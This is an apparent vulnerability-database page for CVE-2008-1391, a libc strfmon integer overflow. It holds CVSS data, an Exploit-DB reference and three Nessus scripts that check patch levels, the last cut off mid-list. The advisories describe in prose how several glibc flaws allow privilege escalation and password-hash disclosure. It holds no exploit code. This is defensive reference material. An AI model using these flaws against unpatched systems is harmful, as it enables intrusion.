Vulnerabilities > CVE-2008-1391 - Numeric Errors vulnerability in multiple products
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL
Summary
Multiple integer overflows in libc in NetBSD 4.x, FreeBSD 6.x and 7.x, and probably other BSD and Apple Mac OS platforms allow context-dependent attackers to execute arbitrary code via large values of certain integer fields in the format argument to (1) the strfmon function in lib/libc/stdlib/strfmon.c, related to the GET_NUMBER macro; and (2) the printf function, related to left_prec and right_prec.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | 8 | |
OS | 1 | |
Common Weakness Enumeration (CWE)
Exploit-Db
description | Multiple BSD Platforms 'strfmon()' Function Integer Overflow Weakness. CVE-2008-1391. DoS exploit for BSD platform |
id | EDB-ID:31550 |
last seen | 2016-02-03 |
modified | 2008-03-27 |
published | 2008-03-27 |
reporter | Maksymilian Arciemowicz |
source | https://www.exploit-db.com/download/31550/ |
title | Multiple BSD Platforms - 'strfmon' Function Integer Overflow Weakness |
Nessus
NASL family | Mandriva Local Security Checks |
NASL id | MANDRIVA_MDVSA-2010-112.NASL |
description | Multiple vulnerabilities were discovered and fixed in glibc: Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880). nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015). The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296). Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830). The updated packages have been patched to correct these issues. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 48185 |
published | 2010-07-30 |
reporter | This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/48185 |
title | Mandriva Linux Security Advisory : glibc (MDVSA-2010:112) |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandriva Linux Security Advisory MDVSA-2010:112.
# The text itself is copyright (C) Mandriva S.A.
#

include("compat.inc");

if (description)
{
  script_id(48185);
  script_version("1.11");
  script_cvs_date("Date: 2019/08/02 13:32:53");

  script_cve_id("CVE-2009-4880", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830");
  script_bugtraq_id(36443, 37885, 40063);
  script_xref(name:"MDVSA", value:"2010:112");

  script_name(english:"Mandriva Linux Security Advisory : glibc (MDVSA-2010:112)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Mandriva Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Multiple vulnerabilities was discovered and fixed in glibc :

Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).

nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015).

The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296).

Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830).

The updated packages have been patched to correct these issues."
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(255);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc-pdf");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-i18ndata");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-profile");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-static-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-utils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:nscd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2010.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2010/06/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/07/30");

  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.");
  script_family(english:"Mandriva Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);

flag = 0;
if (rpm_check(release:"MDK2010.0", reference:"glibc-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-devel-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-doc-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-doc-pdf-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-i18ndata-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-profile-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-static-devel-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"glibc-utils-2.10.1-6.5mnb2")) flag++;
if (rpm_check(release:"MDK2010.0", reference:"nscd-2.10.1-6.5mnb2")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```
NASL family | SuSE Local Security Checks |
NASL id | SUSE_GLIBC-7201.NASL |
description | Several security issues were fixed: - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847) - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevate privileges. (CVE-2010-3856) - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 50377 |
published | 2010-10-28 |
reporter | This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/50377 |
title | SuSE 10 Security Update : glibc (ZYPP Patch Number 7201) |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The text description of this plugin is (C) Novell, Inc.
#

if (NASL_LEVEL < 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(50377);
  script_version ("1.13");
  script_cvs_date("Date: 2019/10/25 13:36:40");

  script_cve_id("CVE-2008-1391", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856");

  script_name(english:"SuSE 10 Security Update : glibc (ZYPP Patch Number 7201)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SuSE 10 host is missing a security-related patch."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Several security issues were fixed :

  - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847)

  - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. (CVE-2010-3856)

  - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830)

  - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296)

  - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391)

  - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called 'adjunct passwd' table, mangling it with the rest of passwd columns instead of keeping it in the shadow table. Normally, Solaris will disclose this information only to clients bound to a priviledged port, but when nscd is deployed on the client, getpwnam() would disclose the password hashes to all users. New mode 'adjunct as shadow' can now be enabled in /etc/default/nss that will move the password hashes from the world-readable passwd table to emulated shadow table (that is not cached by nscd). (CVE-2010-0015)

Some invalid behavior, crashes and memory leaks were fixed :

  - nscd in the paranoia mode would crash on the periodic restart in case one of the databases was disabled in the nscd configuration.

  - When closing a widechar stdio stream, memory would sometimes be leaked.

  - memcpy() on power6 would errorneously use a 64-bit instruction within 32-bit code in certain corner cases.

  - jrand48() returns numbers in the wrong range on 64-bit systems: Instead of [-231, +231), the value was always positive and sometimes higher than the supposed upper bound.

  - Roughly every 300 days of uptime, the times() function would report an error for 4096 seconds, a side-effect of how system calls are implemented on i386. glibc was changed to never report an error and crash an application that would trigger EFAULT by kernel (because of invalid pointer passed to the times() syscall) before.

  - getifaddrs() would report infiniband interfaces with corrupted ifa_name structure field.

  - getgroups(-1) normally handles the invalid array size gracefully by setting EINVAL. However, a crash would be triggered in case the code was compiled using '-DFORTIFYSOURCE=2 -O2'.

  - Pthread cleanup handlers would not always be invoked on thread cancellation (e.g. in RPC code, but also in other parts of glibc that may hang outside of a syscall) - glibc is now compiled with -fasynchronous-unwind-tables.

Some other minor issues were fixed :

  - There was a problem with sprof<->dlopen() interaction due to a missing flag in the internal dlopen() wrapper.

  - On x86_64, backtrace of a static destructor would stop in the _fini() glibc pseudo-routine, making it difficult to find out what originally triggered the program termination. The routine now has unwind information attached.

  - glibc-locale now better coexists with sap-locale on upgrades by regenerating the locale/gconv indexes properly."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2008-1391.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0015.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0296.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0830.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-3847.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-3856.html"
  );
  script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 7201.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(189, 255);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2010/10/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/28");

  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented.");

flag = 0;
if (rpm_check(release:"SLED10", sp:3, reference:"glibc-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, reference:"glibc-devel-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, reference:"glibc-html-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, reference:"glibc-i18ndata-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, reference:"glibc-info-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, reference:"glibc-locale-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, reference:"nscd-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, cpu:"x86_64", reference:"glibc-32bit-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, cpu:"x86_64", reference:"glibc-devel-32bit-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLED10", sp:3, cpu:"x86_64", reference:"glibc-locale-32bit-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-devel-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-html-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-i18ndata-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-info-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-locale-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"glibc-profile-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, reference:"nscd-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-32bit-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-devel-32bit-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-locale-32bit-2.4-31.77.76.1")) flag++;
if (rpm_check(release:"SLES10", sp:3, cpu:"x86_64", reference:"glibc-profile-32bit-2.4-31.77.76.1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else exit(0, "The host is not affected.");
```
NASL family | SuSE Local Security Checks |
NASL id | SUSE_11_GLIBC-101025.NASL |
description | This update of glibc fixes various bugs and security issues: - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847) - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevate privileges. (CVE-2010-3856) - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 50912 |
published | 2010-12-02 |
reporter | This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/50912 |
title | SuSE 11 / 11.1 Security Update : glibc (SAT Patch Numbers 3392 / 3393) |
code |

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SuSE 11 update information. The text itself is
# copyright (C) Novell, Inc.
#

if (NASL_LEVEL < 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(50912);
  script_version("1.14");
  script_cvs_date("Date: 2019/10/25 13:36:39");

  script_cve_id("CVE-2008-1391", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856");

  script_name(english:"SuSE 11 / 11.1 Security Update : glibc (SAT Patch Numbers 3392 / 3393)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SuSE 11 host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update of glibc fixes various bugs and security issues :

  - Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. (CVE-2010-3847)

  - The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. (CVE-2010-3856)

  - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830)

  - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296)

  - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391)

  - Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called 'adjunct passwd' table, mangling it with the rest of passwd columns instead of keeping it in the shadow table. Normally, Solaris will disclose this information only to clients bound to a priviledged port, but when nscd is deployed on the client, getpwnam() would disclose the password hashes to all users. New mode 'adjunct as shadow' can now be enabled in /etc/default/nss that will move the password hashes from the world-readable passwd table to emulated shadow table (that is not cached by nscd). (CVE-2010-0015)

Some invalid behaviour, crashes and memory leaks were fixed :

  - statfs64() would not function properly on IA64 in ia32el emulation mode.

  - memcpy() and memset() on power6 would erroneously use a 64-bit instruction within 32-bit code in certain corner cases.

  - nscd would not load /etc/host.conf properly before performing host resolution - most importantly, multi on in /etc/host.conf would be ignored when nscd was used, breaking e.g. resolving records in /etc/hosts where single name would point at multiple addresses

  - Removed mapping from lowercase sharp s to uppercase sharp S; uppercase S is not a standardly used letter and causes problems for ISO encodings.

Some other minor issues were fixed :

  - glibc-locale now better coexists with sap-locale on upgrades by regenerating the locale/gconv indexes properly.

  - Ports 623 and 664 may not be allocated by RPC code automatically anymore since that may clash with ports used on some IPMI network cards.

  - On x86_64, backtrace of a static destructor would stop in the _fini() glibc pseudo-routine, making it difficult to find out what originally triggered the program termination. The routine now has unwind information attached."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=375315"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=445636"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=513961"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=534828"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=541773"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=569091"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=572188"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=585879"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=592941"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=594263"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=615556"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=646960"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2008-1391.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0015.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0296.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0830.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-3847.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-3856.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Apply SAT patch number 3392 / 3393 as appropriate."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(189, 255);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-html");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-info");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-locale");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-profile");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:nscd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");

  script_set_attribute(attribute:"patch_publication_date", value:"2010/10/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/02");

  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)11") audit(AUDIT_OS_NOT, "SuSE 11");
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SuSE 11", cpu);

flag = 0;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-devel-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-i18ndata-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"glibc-locale-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i586", reference:"nscd-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i686", reference:"glibc-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"i686", reference:"glibc-devel-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-devel-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-devel-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-i18ndata-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-locale-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"glibc-locale-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:0, cpu:"x86_64", reference:"nscd-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-devel-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-i18ndata-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"glibc-locale-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i586", reference:"nscd-2.11.1-0.20.1")) flag++;
